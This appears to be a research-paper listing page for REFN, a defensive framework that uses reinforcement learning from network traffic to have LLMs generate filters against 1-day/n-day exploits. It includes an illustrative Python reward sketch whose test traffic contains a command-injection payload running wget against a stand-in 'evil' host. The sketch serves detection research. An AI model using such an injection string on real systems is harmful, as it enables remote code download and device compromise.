REFN: A Reinforcement-Learning-From-Network Framework against 1-day/n-day Exploitations

📅 2025-08-14
📈 Citations: 0
✨ Influential: 0
🤖 AI Summary
Defending against 1-day/n-day exploit attacks on network devices remains challenging due to the poor cross-device scalability, low legacy-system compatibility, and error-prone manual deployment of existing host-patching and network-filtering solutions. Method: This paper proposes REFN, a novel network-driven reinforcement learning framework that leverages real-time traffic as an online reward signal to guide a large language model (LLM) in autonomously generating precise network filtering rules. REFN integrates proxy-based RAG knowledge distillation to enhance vulnerability semantic understanding, employs a VNF pipeline for end-to-end "language-to-network-policy" translation, and incorporates an online proxy verification mechanism to mitigate LLM hallucination. Contribution/Results: Evaluated across 22 real-world attack scenarios, REFN achieves a 21.1% accuracy improvement over state-of-the-art methods, reduces mean remediation time to 3.65 hours, and scales to 10K heterogeneous network devices.

๐Ÿ“ Abstract
The exploitation of 1 day or n day vulnerabilities poses severe threats to networked devices due to massive deployment scales and delayed patching (average Mean Time To Patch exceeds 60 days). Existing defenses, including host based patching and network based filtering, are inadequate due to limited scalability across diverse devices, compatibility issues especially with embedded or legacy systems, and error prone deployment process (manual patch validation). To address these issues, we introduce REFN (Reinforcement Learning From Network), a novel framework that trains Large Language Models (LLMs) to autonomously generate network filters to prevent 1 day or n day exploitations. REFN ensures scalability by uniquely employs Reinforcement Learning (RL) driven by online network rewards instead of traditional Human Feedback (RLHF). REFN guarantees compatibility via unified deployment on edge security gateways (Amazon Eero). REFN provides robustness via online validation using real network traffic. Crucially, REFN addresses three core challenges in training LLMs for exploit prevention: 1) expanding current LLMs limited vulnerability fixing expertise via Agentic RAG based Knowledge Distillation, 2) bridging current LLMs language to network gaps through an RL From VNF Pipeline that translates language context (vulnerability description) into network enforcement, 3) addressing the LLM hallucination and non determinism via the Online Agentic Validation that penalizes erroneous outputs. Evaluated across 22 families of 1 day or n day exploits, REFN demonstrates effectiveness (21.1 percent higher accuracy than alternatives), efficiency (Mean Time To Patch of 3.65 hours) and scalability (easily scale to 10K devices). REFN serves as an initial step toward training LLMs to rapidly prevent massive scale 1 day or n day exploitations.
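The abstract's core idea, RL driven by online network rewards that penalize erroneous filters, can be illustrated with a minimal sketch. Everything below (the `Flow` record, the toy rule format, the port and signature values) is a hypothetical illustration, not the paper's actual implementation:

```python
# Sketch of a network-derived reward (illustrative, not REFN's code): a
# generated filter is scored against replayed traffic. Blocking an exploit
# flow adds reward; blocking a benign flow (a false positive, e.g. from a
# hallucinated rule) subtracts reward, which is the penalty signal during RL.
from dataclasses import dataclass

@dataclass
class Flow:
    dst_port: int
    payload: str
    is_exploit: bool  # ground-truth label for the replayed trace

def rule_blocks(rule: dict, flow: Flow) -> bool:
    """Toy filter semantics: match destination port and a payload signature."""
    return flow.dst_port == rule["dst_port"] and rule["signature"] in flow.payload

def network_reward(rule: dict, traffic: list[Flow]) -> float:
    """Online reward: +1 per blocked exploit, -1 per blocked benign flow."""
    score = 0
    for flow in traffic:
        if rule_blocks(rule, flow):
            score += 1 if flow.is_exploit else -1
    return score / len(traffic)

# Hypothetical rule an LLM might emit for a command-injection CVE on port 8080.
rule = {"dst_port": 8080, "signature": ";wget "}
traffic = [
    Flow(8080, "GET /cgi-bin/x?cmd=;wget http://evil/sh", True),
    Flow(8080, "GET /index.html", False),
    Flow(443, "normal TLS traffic", False),
]
print(network_reward(rule, traffic))  # one exploit blocked, no benign flows blocked
```

A real deployment would replace the toy matcher with rules enforced on the edge gateway and compute the reward from live or replayed traffic, but the shape of the feedback loop is the same.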
Problem

Research questions and friction points this paper is trying to address.

Addresses delayed patching and scalability in networked devices
Ensures compatibility with diverse and legacy systems
Improves accuracy and speed of exploit prevention
Innovation

Methods, ideas, or system contributions that make the work stand out.

Uses Reinforcement Learning for network filter generation
Deploys unified edge gateways for compatibility
Employs online validation to ensure robustness
Tianlong Yu (CMU)
Lihong Liu (School of Artificial Intelligence, Hubei University, Wuhan, China)
Ziyi Zhou (School of Artificial Intelligence, Hubei University, Wuhan, China)
Fudu Xing (University of Southern California, Los Angeles, USA)
Kailong Wang (Huazhong University of Science and Technology, Wuhan, China)
Yang Yang (School of Artificial Intelligence, Hubei University, Wuhan, China)